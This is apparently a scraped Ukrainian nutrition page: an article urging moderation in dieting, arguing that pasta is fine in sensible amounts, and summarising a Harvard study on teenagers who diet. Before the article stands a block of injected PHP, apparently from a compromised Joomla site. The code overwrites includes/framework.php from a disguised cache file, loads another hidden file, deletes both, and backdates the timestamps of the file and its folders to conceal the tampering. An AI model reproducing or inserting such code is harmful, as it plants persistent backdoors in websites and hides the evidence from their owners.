$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Все добре в міру | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Все добре в міру

Дієти часто допомагають швидко скинути кілограми, але відбувається це в основному за рахунок води та м'язової маси. Щоб дістатися до талії або зменшити живіт, потрібно позбавитися від зайвого жиру. Фахівці «садять» бажаючих бути красивими на дієту з низьким вмістом насичених жирів. Вона складається зі свіжих фруктів, овочів і продуктів, багатих крохмалем, наприклад коричневий рис, хліб з цілісного зерна і макаронних виробів. Можливе заперечення проти макаронів аргументується просто. Товщі ми стаємо не від них. Вага набирають з-за надлишку калорій.

Якщо ви здорові, забудьте ці страхи, не нервуйте і їжте спагеті, макарони, вермішель, ріжки. Вони корисні. Єдине прохання - не їжте їх занадто багато. Від будь-якого продукту у великих кількостях можна погладшати. Якщо ви страждаєте порушенням обміну речовин, яке називається інсулінорезистентністю, будьте обережні з «маложирними» дієтами. Якщо ви заміните калорії, які дають організму насичені жири (масло, вершки і яйця), калоріями з вуглеводів (макаронні вироби, рис, картопля і знежирені десерти), то у вас може піднятися рівень цукру в крові або збільшитися ризик виникнення хвороб серця.

Вся ця «трагедія» з макаронами говорить про те, що не існує однієї «правильної» дієти для всіх і для кожного. Адже не всі товстіють однаково. Не в тому річ, скільки жирів у вашій їжі, головне - скільки в ній калорій. Щоб справитися із зайвими кілограмами, ви повинні отримувати калорії з різних корисних продуктів.

Американські дослідники з Гарвардського університету прийшли до висновку, що будь-які дієти приносять підліткам (і хлопчикам, і дівчаткам) не користь, а шкоду. Протягом трьох років вчені вели спостереження за 15 тисячами дітей у віці від 9 до 14 років і виявили, що ті, хто сидів на дієтах, як правило, набирали більше ваги, ніж ті, які ніяких дієт не дотримувалися. До найбільшого збільшення ваги, особливо у дівчаток, приводили і дієти, і обжерливість. Вірогідність останнього значно підвищувалася. Як пояснити ці факти? Згідно з однією з теорій, дієти змінюють дитячий метаболізм таким чином, що організму потрібно менше калорій для підтримки постійного ваги. Відповідно до іншої теорії (адже це ж вперті підлітки!), надмірна суворість дієти викликає у дітей бажання її порушити, після чого вони впадають у крайнощі.

Молодим людям, які стурбуються про свою вагу, треба вносити до харчування і у свій спосіб життя такі невеликі зміни, які вони в змозі тривало дотримуватися: наприклад, переходити на менш жирне молоко або поступово збільшувати число та інтенсивність фізичних вправ. До жорсткої дієти, навіть при ожирінні, слід вдаватися лише у виняткових випадках і завжди під наглядом досвідченого дієтолога.

За матеріалами сайту http://medproza.ru/

 
Харчування-здоровий спосіб життя Все добре в міру